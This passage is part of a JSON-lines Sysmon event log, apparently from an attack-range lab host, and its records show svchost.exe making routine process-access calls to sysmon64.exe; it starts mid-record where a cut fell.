07:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7220,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:01.806\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:01.806","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7221,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:01.806\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:01.806","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7222,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:01.806\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:01.806","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7223,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:01.806\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:01.806","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7224,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:01.806\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:01.806","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7225,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:01.806\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:01.806","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7226,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:01.806\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:01.806","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7227,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:01.806\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:01.806","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
